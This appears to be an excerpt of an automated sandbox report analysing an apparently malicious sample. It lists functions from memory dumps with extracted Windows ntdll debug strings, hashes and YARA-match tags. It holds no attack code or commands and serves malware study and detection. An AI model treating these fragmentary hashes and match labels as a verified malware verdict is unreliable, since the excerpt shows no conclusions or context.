                                                            • double initialized or corrupted critical section, xrefs: 01005508
                                                            • Invalid debug info address of this critical section, xrefs: 010054B6
                                                            • undeleted critical section in freed memory, xrefs: 0100542B
                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0100540A, 01005496, 01005519
                                                            • 8, xrefs: 010052E3
                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010054CE
                                                            • Thread identifier, xrefs: 0100553A
                                                            • Critical section debug info address, xrefs: 0100541F, 0100552E
                                                            • Critical section address., xrefs: 01005502
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                            • API String ID: 0-2368682639
                                                            • Opcode ID: ccf77b7148d04728bda325cddc5e82b90fa60fcb91dac9c65f36e7c58bec4446
                                                            • Instruction ID: 1023043354d18a0e41f6bd54fcc8b3a58d43a5c860a8696d2b07dad24ea7f459
                                                            • Opcode Fuzzy Hash: ccf77b7148d04728bda325cddc5e82b90fa60fcb91dac9c65f36e7c58bec4446
                                                            • Instruction Fuzzy Hash: 5481AE71A40348AFEB61CF98CC45FAEBBB5BB08B14F10805AF548B7280D775A945DF61
                                                            Function 00FC29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01002624
                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010022E4
                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01002506
                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01002602
                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010024C0
                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01002412
                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01002498
                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01002409
                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0100261F
                                                            • @, xrefs: 0100259B
                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010025EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                            • API String ID: 0-4009184096
                                                            • Opcode ID: 762066d6360469e9fe5c3cde0ef9922d7f0976b52ab2db29bb40552c39fe855e
                                                            • Instruction ID: 717b8b18cc82141e6a790b92e8b12a0c53d6e48bd9cdadc8ec6abd27f62388af
                                                            • Opcode Fuzzy Hash: 762066d6360469e9fe5c3cde0ef9922d7f0976b52ab2db29bb40552c39fe855e
                                                            • Instruction Fuzzy Hash: AF02AFF2D002299BEB61DB14CD85BDEB7B8AB44714F0041EAE64DA7281DB309F84DF59
                                                            Function 00FC0F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                            • API String ID: 0-360209818
                                                            • Opcode ID: 09be0fe0c9738eabb6009b0ce6447159c9b22e4498ce7d22623b780eb1168a99
                                                            • Instruction ID: 8e6acdded366a3dfaace30ff9508c714dc47f997955d0b97f511bd2cae25608e
                                                            • Opcode Fuzzy Hash: 09be0fe0c9738eabb6009b0ce6447159c9b22e4498ce7d22623b780eb1168a99
                                                            • Instruction Fuzzy Hash: 9362A2B5E002258FEB65CF18CC417A9B7B6BF95310F5482DAD589AB280D7729EE1CF40
                                                            Function 01038B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                            • API String ID: 0-2515994595
                                                            • Opcode ID: 72f65ad241f1b35e6a64d51cb722b21ace382dc367ec81ed8db020a22d937e84
                                                            • Instruction ID: c0eae3acc4a6e1b720f84f3df69afe804cf67b829dc0519ab651b0af498acb0e
                                                            • Opcode Fuzzy Hash: 72f65ad241f1b35e6a64d51cb722b21ace382dc367ec81ed8db020a22d937e84
                                                            • Instruction Fuzzy Hash: 3C51CF711183059BD365EF288849BABBBECBFC4354F148A9EB99883241E774D504DB92
                                                            Function 010412ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                            • API String ID: 0-3591852110
                                                            • Opcode ID: c5cc5131737e693283a5c3b85e442d066d170bc5002d96a9f1f54ed1ca49ba7f
                                                            • Instruction ID: 7eb44614907bb2e1fa00ce99e71600e7ff114270aedcdb93addd038ebe23d096
                                                            • Opcode Fuzzy Hash: c5cc5131737e693283a5c3b85e442d066d170bc5002d96a9f1f54ed1ca49ba7f
                                                            • Instruction Fuzzy Hash: 79127DB0604642DFD725DF28C485BBABBF1BF09714F1884A9E5C68B692D734F881DB90
                                                            Function 00FAAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                            • API String ID: 0-3197712848
                                                            • Opcode ID: 43a18121d16472cb479bebf4a7c9be19d6f5dea792022b8d0c5df369d3118d7f
                                                            • Instruction ID: ded5a2899ec123eafd72f1162b26ce67522f8718da1a1c7b5b53d78b6ce0c5d3
                                                            • Opcode Fuzzy Hash: 43a18121d16472cb479bebf4a7c9be19d6f5dea792022b8d0c5df369d3118d7f
                                                            • Instruction Fuzzy Hash: 901202B1A083458FD324DF24C881BBAB3E4BF86754F04451DF9C58B291EB35D949EB52
                                                            Function 00F8D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                            • API String ID: 0-3532704233
                                                            • Opcode ID: 2cf1701b9ec69bd522878b1cdf9d32cded255de301e6a41bf89c5f2b5e7f0f3c
                                                            • Instruction ID: d72eb92d08316281943a9b9afbe44272747a1e55b3c59a31ee43585b34a882c4
                                                            • Opcode Fuzzy Hash: 2cf1701b9ec69bd522878b1cdf9d32cded255de301e6a41bf89c5f2b5e7f0f3c
                                                            • Instruction Fuzzy Hash: 13B18C729083559FC711EF25C880BABB7E8AF88754F05492EF889D7280D774ED44AB92
                                                            Function 01040CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                            • API String ID: 0-1357697941
                                                            • Opcode ID: d7b9b204e91f8d88a8d8a304bc8faa3fd398e1cacf6a1cccf46b2462491c4063
                                                            • Instruction ID: e47be6600de53e9774e564bae36544f6c70aac9f1f6a39f93d05e392b1188909
                                                            • Opcode Fuzzy Hash: d7b9b204e91f8d88a8d8a304bc8faa3fd398e1cacf6a1cccf46b2462491c4063
                                                            • Instruction Fuzzy Hash: 79F1F1B1600646EFDB25DF68C481BEABBF5FF09700F0840A9F6C1A7692C774A985CB50
                                                            Function 01040274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                            • API String ID: 0-1700792311
                                                            • Opcode ID: 1325b2134d4b0769d38a4f85848ea01d66c8f01d01e013c1c9d61c497a53cfb5
                                                            • Instruction ID: 382678716f2d798d9204262f1830630226232a329fd8e03300d2676b1e8c868f
                                                            • Opcode Fuzzy Hash: 1325b2134d4b0769d38a4f85848ea01d66c8f01d01e013c1c9d61c497a53cfb5
                                                            • Instruction Fuzzy Hash: 15D1CEB1504641DFDB12EF68C881AEEBBF1FF49B10F0880A9F685AB256C739D940DB54
                                                            Function 010189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • VerifierDlls, xrefs: 01018CBD
                                                            • VerifierDebug, xrefs: 01018CA5
                                                            • VerifierFlags, xrefs: 01018C50
                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01018A3D
                                                            • HandleTraces, xrefs: 01018C8F
                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01018A67
                                                            • AVRF: -*- final list of providers -*- , xrefs: 01018B8F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                            • API String ID: 0-3223716464
                                                            • Opcode ID: 78a52980e2f06a6cb27a756ef86bdbef8497101004f390289067527fb3897ee1
                                                            • Instruction ID: 961df697dba500ae892626ba4ff07830ab88680ad2d0bb6282e20bdaa1d22817
                                                            • Opcode Fuzzy Hash: 78a52980e2f06a6cb27a756ef86bdbef8497101004f390289067527fb3897ee1
                                                            • Instruction Fuzzy Hash: 489135726093069FD321EF688C81B5EB7E4BB85714F44845AFAC46B249C73DAE00CB96
                                                            Function 00F9EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                            • API String ID: 0-1109411897
                                                            • Opcode ID: c67989fe2df67b1f5c2ebe6b782a80ce247f1d4d46aa0eb3335e913c8ac398ad
                                                            • Instruction ID: 5179ca45eaa6e4da3db90baf02141a02bfd68c54c4932ab1f8511adc6f532ad8
                                                            • Opcode Fuzzy Hash: c67989fe2df67b1f5c2ebe6b782a80ce247f1d4d46aa0eb3335e913c8ac398ad
                                                            • Instruction Fuzzy Hash: 83A25B71E056298FDF64DF14CC887AAB7B1AF45314F2442E9D909A72A0DB34AEC5EF40
                                                            Function 00F8F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-523794902
                                                            • Opcode ID: 90f4d5e67208c84a5d8bd1d33ef3af5385c94e3ee5502c26c2df2fffaf3fd6be
                                                            • Instruction ID: 0c44a0a64020c65e58622f9199963c299e36de38cc7876da3eed578df0a7d9e7
                                                            • Opcode Fuzzy Hash: 90f4d5e67208c84a5d8bd1d33ef3af5385c94e3ee5502c26c2df2fffaf3fd6be
                                                            • Instruction Fuzzy Hash: 43420F716083819FC711EF29D884BAABBE5FF84714F18496DF4868B352D738D845EB12
                                                            Function 00F9ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                            • API String ID: 0-4098886588
                                                            • Opcode ID: bfaea8f89db20a33580a30c276498778276e1e6cafa506744e01a55ae26f4622
                                                            • Instruction ID: 67dff453441a3c2f17ab1cade02a8d12c3243741f7a748dadb067c8ee43d487a
                                                            • Opcode Fuzzy Hash: bfaea8f89db20a33580a30c276498778276e1e6cafa506744e01a55ae26f4622
                                                            • Instruction Fuzzy Hash: EF32BC71D042698BEF22CF14D998BEEB7B5AF45350F2440EAE849A7260D7359FC1AF40
                                                            Function 00FAB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                            • API String ID: 0-122214566
                                                            • Opcode ID: 100f811d861a11166bf8c0bd13aa90de64b404ed6e0afb56149332c9dbe1c4a7
                                                            • Instruction ID: 7495586cde722cb9a3e5deba5ad8c5da7173037d55c45d1f336a1ad750862f43
                                                            • Opcode Fuzzy Hash: 100f811d861a11166bf8c0bd13aa90de64b404ed6e0afb56149332c9dbe1c4a7
                                                            • Instruction Fuzzy Hash: 93C135B1E04219ABDF24DF64CC81BBEB7A5AF46710F14406AE9029B293DB78DC45F391
                                                            Function 00FC63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-792281065
                                                            • Opcode ID: a36427f154686fa08bdabf11664c4b158d7fbc56f0c9e82ba9d4db701ebef283
                                                            • Instruction ID: c9d0353d9a7f3626c64b059fa316c9acef7e942b6dc94aae17f139e7e35e4cf7
                                                            • Opcode Fuzzy Hash: a36427f154686fa08bdabf11664c4b158d7fbc56f0c9e82ba9d4db701ebef283
                                                            • Instruction Fuzzy Hash: 46913831B083129BEB3AEF14DD46FAD77A0BB40B24F14016DEAC4AB2C1D7799801E795
                                                            Function 00F11279 Relevance: 7.7, Strings: 6, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ie$N$Ie%I$VUUU$[$gfff$p
                                                            • API String ID: 0-3953077281
                                                            • Opcode ID: 0229ed3250cda77d43a15d711b1a95367fd529036d1517930c1d938487c0294f
                                                            • Instruction ID: ac33e1de585d83f984c5233b395693f81fc4bbfd20a608a64acfbee592d3f9b7
                                                            • Opcode Fuzzy Hash: 0229ed3250cda77d43a15d711b1a95367fd529036d1517930c1d938487c0294f
                                                            • Instruction Fuzzy Hash: 80812A71E002099BDF08CF98E8502FEB775FFD1364F20826AE918EF645E7759A818791
                                                            Function 00FC2CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 0100276F
                                                            • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 0100279C
                                                            • \WinSxS\, xrefs: 00FC2E23
                                                            • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 01002706
                                                            • .Local\, xrefs: 00FC2D91
                                                            • @, xrefs: 00FC2E4D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                            • API String ID: 0-3926108909
                                                            • Opcode ID: f623b08797ea662c779d1dad615c0e744e5b3c5235278939d394eb2e6380ae1e
                                                            • Instruction ID: 813bbac0a2fc2e86c03e8c0685a86427be5514d3e60020432e6ff63d7e7af47b
                                                            • Opcode Fuzzy Hash: f623b08797ea662c779d1dad615c0e744e5b3c5235278939d394eb2e6380ae1e
                                                            • Instruction Fuzzy Hash: FF81C8715083029FDB12CF18C885BAABBE8FF95714F04885EF885CB281D774D944DBA2
                                                            Function 00F8645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • apphelp.dll, xrefs: 00F86496
                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00FE9A01
                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00FE99ED
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FE9A11, 00FE9A3A
                                                            • LdrpInitShimEngine, xrefs: 00FE99F4, 00FE9A07, 00FE9A30
                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00FE9A2A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-204845295
                                                            • Opcode ID: 11b10afbe76683270e4588ee23059d4b908fd51343524ff131be999bc2c276ca
                                                            • Instruction ID: bbb959e359449300fe1a8d7a632f1701bb168d5da972a93611ffe03e23d0c489
                                                            • Opcode Fuzzy Hash: 11b10afbe76683270e4588ee23059d4b908fd51343524ff131be999bc2c276ca
                                                            • Instruction Fuzzy Hash: 9B51AF712083409BE320EF24DC42BAB77E4FF84B54F14492AF5859B1A1D778E944ABA3
                                                            Function 00FCC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01008181, 010081F5
                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 010081E5
                                                            • Loading import redirection DLL: '%wZ', xrefs: 01008170
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FCC6C3
                                                            • LdrpInitializeProcess, xrefs: 00FCC6C4
                                                            • LdrpInitializeImportRedirection, xrefs: 01008177, 010081EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                            • API String ID: 0-475462383
                                                            • Opcode ID: 3edd50f79e21d7bdc408c02a6dfd85e6006a5416f1b29abcca24f58b3e94103a
                                                            • Instruction ID: d2cdf01f99b35935c57352319c49d9b4760c750b69482833d90803a93ab17e0a
                                                            • Opcode Fuzzy Hash: 3edd50f79e21d7bdc408c02a6dfd85e6006a5416f1b29abcca24f58b3e94103a
                                                            • Instruction Fuzzy Hash: 6C3115716483029BD224EF28DD46E5A77D5FF84B10F044569F8C8AB2D1E624EC04EBA3
                                                            Function 00FC2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01002178
                                                            • SXS: %s() passed the empty activation context, xrefs: 01002165
                                                            • RtlGetAssemblyStorageRoot, xrefs: 01002160, 0100219A, 010021BA
                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0100219F
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010021BF
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01002180
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                            • API String ID: 0-861424205
                                                            • Opcode ID: 56bd9871baf4dc37bd559794dbe2f258ad0a60a28c9185f8b8bf832405003d5c
                                                            • Instruction ID: ea14af81c242fc13aec0bd7e878d066028874714641904c626a772ecbe7db88c
                                                            • Opcode Fuzzy Hash: 56bd9871baf4dc37bd559794dbe2f258ad0a60a28c9185f8b8bf832405003d5c
                                                            • Instruction Fuzzy Hash: 82310936F40326B7F7229A558C8AF9E7678DFA4B50F154069FA08A7180D270DE01E6A2
                                                            Function 00FA9950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                            • API String ID: 0-3393094623
                                                            • Opcode ID: 0d811b0c5ee56a22744d06a064d6618a4b49a45e8e359522378d5a360e046d64
                                                            • Instruction ID: f1ae7fe021da24ff5c57f62afec909bde930805ce686a718b7f1e85701aee291
                                                            • Opcode Fuzzy Hash: 0d811b0c5ee56a22744d06a064d6618a4b49a45e8e359522378d5a360e046d64
                                                            • Instruction Fuzzy Hash: D0027DB190C341CFC720CF24C480B6BB7E5BF8A764F14892EE99987250D7B4D944EBA2
